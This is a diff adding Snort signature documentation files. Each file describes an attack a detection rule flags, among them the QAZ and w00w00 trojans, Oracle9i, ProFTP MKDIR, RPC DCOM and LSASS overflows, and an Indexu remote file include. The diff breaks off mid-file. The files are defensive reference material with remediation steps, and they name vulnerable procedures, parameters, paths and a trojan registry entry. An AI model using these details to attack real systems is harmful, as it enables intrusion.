+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2973.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2973
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/733.txt
@@ -0,0 +1,97 @@
+Rule:
+
+--
+Sid:
+733
+
+--
+Summary:
+QAZ is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes changes to the system registry.
+
+The Trojan changes system startup files and registry settings to add the QAZ sever to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	108	QAZ Worm Client Login access
+	731	Virus - Possible QAZ Worm (Indicates worm activity)
+	775	Virus - Possible QAZ Worm Infection (Indicates worm activity)
+	733	Virus - Possible QAZ Worm Calling Home (Indicates the worm is trying to send mail)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
+
+Registry keys added are:
+
+	StartIE=C:\WINDOWS\notepad.exe qazwsx.hsq
+
+This will start the Trojan each time notepad is executed.
+
+Look for the existence of the file note.com. The file notepad.exe may have been replaced with a Trojaned version that is approximately 120 kb in size (the original is 52 kb).
+
+A machine reboot is required to clear the existing process from running in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS501
+http://www.whitehats.com/info/IDS498
+http://www.whitehats.com/info/IDS499
+
+McAfee
+http://vil.nai.com/vil/content/v_98775.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.qaz.a.html
+
+Diamond Computer Systems Security Advisory
+http://www.diamondcs.com.au/web/alerts/qaz.htm
+
+--
--- /dev/null
+++ b/doc/signatures/813.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+813
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/860.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+860
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/462.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+462
+
+--
+
+Summary:
+This event is generated when an ICMP Type 7 datagram with an undefined ICMP Code is detected on the network. 
+
+--
+
+Impact:
+ICMP Type 7 datagrams are not currently used by any known devices.
+
+--
+
+Detailed Information:
+ICMP Type 7 is not defined for use and is not expected network activity.  Any ICMP datagram with an undefined ICMP Code should be investigated.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 7 datagrams
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2843.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2843
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_snapshot_repobject
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2688.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2688
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure enable_receiver_trace
+. This procedure is included in
+sys.dbms_internal_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1973.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1973
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow vulnerability associated with ProFTP FTP server MKDIR command. 
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of arbitrary commands with privileges of the process running the ProFTP server. 
+
+--
+Detailed Information:
+A vulnerability exists with the MKDIR command that can cause a buffer overflow and permit the execution of arbitrary commands with the privileges of the process running the Pr oFTP server.  The buffer overflow can be caused by supplying an argument of greater than 255 characters designating the new directory name.  
+--
+Affected Systems:
+Hosts running ProFTP 1.2.0pre4 
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the MKDIR command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0991
+
+Bugtraq:
+http://www.securityfocus.com/bid/612
+
+--
--- /dev/null
+++ b/doc/signatures/450.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+450
+
+--
+Summary:
+This event is generated when an ICMP "Time Exceeded" message is generated that has an invalid ICMP code.  
+
+--
+Impact:
+Informational.  This may indicate that the ICMP message has been crafted.
+
+--
+Detailed Information:
+An ICMP "Time Exceeded" message is issued when either the maximum number of hops has been exceeded or a timer has expired before all fragments have been received.  The ICMP code value for this message should be 0 or 1.  If a value of greater than 1 for the ICMP code is observed, it may be an indication that the packet was crafted with an invalid value.
+
+--
+Affected Systems:
+This traffic should have no adverse impact.
+
+--
+Attack Scenarios:
+An attacker may craft an ICMP "Time Exceeded" message with an invalid ICMP code.  A single packet itself is not harmful, but the unusual ICMP code may indicate that this packet was abnormally generated.
+
+--
+Ease of Attack:
+Simple. There are many packages available to generate ICMP messages.
+
+--
+False Positives:
+Although rare, it is possible to observe an ICMP "Time Exceeded" message with an ICMP code greater than 1 if it is generated by software that does not conform to standards.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+If a host or device in your network is generating this message, investigate why it does not have a standard ICMP code.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/958.txt
@@ -0,0 +1,76 @@
+Rule:
+--
+Sid:
+958
+
+--
+
+Summary:
+This event is generated when an attempt is made to access a file with 
+sensitive information on a webserver with Microsoft Frontpage extensions
+enabled.
+
+--
+
+Impact:
+If successful, the attacker can read sensitive data about the Frontpage web.
+
+--
+
+Detailed Information:
+On systems running Microsoft Frontpage Extensions on IIS or Apache web 
+servers the file _vti_pvt/service.cnf exists which may contain sensitive
+information about the web server. This file is meant to be only used 
+internally by FPSE and never directly by the user.
+
+--
+
+Affected Systems:
+	Systems using Microsoft FrontPage Server Extensions 98
+
+--
+
+Attack Scenarios:
+An attacker can request the file from its standard location, entering the exact URL.
+
+--
+
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable direct access to the file /_vti_pvt/service.cnf.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q188/2/57.ASP&NoWebContent=1&NoWebContent=1
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/3233.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3233
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3057.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3057
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1422.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+
+1422
+
+--
+Summary:
+This event is generated when an attempt is made to issue an attack against a machine using SNMP v1.
+
+--
+Impact:
+Varies depending on the implementation. Ranges from Denial of Service (DoS) to code execution.
+
+--
+Detailed Information:
+SNMP is a widely adopted protocol for managing IP networks, including individual network devices, and devices in aggregate. 
+
+Several network devices come pre-installed with this protocol for management and monitoring.
+
+A number of vulnerabilities exist in SNMP v1, including a community string buffer overflow, that will allow an attacker to execute arbitrary code or shutdown the service.
+
+--
+Affected Systems:
+Any implementation of SNMP v1 protocol
+	
+--
+Attack Scenarios:
+An attacker needs to send a specially crafted packet to UDP port 161 of a vulnerable device, causing a Denial of Service or execution of any command.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable SNMP v1 protocol, use SNMP v2 protocol.
+
+Use Ingress/Egress filtering on a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-03.html
+
+--
--- /dev/null
+++ b/doc/signatures/3371.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3371
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2656.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2656
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with Netscape Network Security Services (NSS) message parsing.
+
+--
+Impact:
+A successful attack can cause a heap overflow and the subsequent execution
+of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+A vulnerability exists in the way NSS parses a client connect SSLv2 message
+that can cause a heap overflow and the subsequent execution of arbitrary code
+on a vulnerable server.  This can occur when an overly long challenge length
+and accompanying data are supplied in a Client Hello message.
+
+--
+Affected Systems:
+Netscape Enterprise Webserver all versions
+Netscape Personalization Engine all versions
+Nescape Directory Server all versions
+Netscape Certificate Management Server all versions
+Sun One/iPlanet all versions
+
+--
+Attack Scenarios:
+An attacker can send a Client Hello message with an overly long challenge
+length and data, causing a heap overflow on a vulnerable server.
+
+--
+Ease of Attack:
+Difficult.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2728.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2728
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_raw
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/209.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+209
+
+--
+Summary:
+w00w00 is a Trojan Horse utilizing Telnet. This event is generated when 
+an attacker attempts to connect to a w00w00 server using Telnet.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to. This Trojan
+also has the ability to delete data, steal passwords and disable the
+machine.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS510
+
+--
--- /dev/null
+++ b/doc/signatures/100000612.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000612
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_duplicate.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"link_duplicate.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2511.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2511
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1665.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1665
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2377.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2377
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Checkpoint VPN-1.
+
+--
+Impact:
+Unauthorized administrative access to Checkpoint VPN-1 systems
+
+--
+Detailed Information:
+Checkpoint VPN-1, SecuRemote and SecureClient contain an error that
+affects the processing of large Certificate requests to the VPN service.
+By sending a large amount of data in the Certificate Request payload an
+attacker may cause a buffer overflow condition to occur, presenting an
+opportunity to execute code of their choosing with the privileges of the
+user running the service, usually root.
+
+--
+Affected Systems:
+	CheckPoint Software FW-1 1.4.1 Service packs prior to SP6
+	CheckPoint Software FW-1 Next Generation FP1, FP0
+	CheckPoint Software VPN-1 1.4.1 SP5a
+	CheckPoint Software VPN-1 Next Generation FP1, FP0
+
+--
+Attack Scenarios:
+An attacker could supply a large Certificate Request payload containing
+code to be executed on the system.
+
+--
+Ease of Attack:
+Proof of concept code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2522.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2522
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
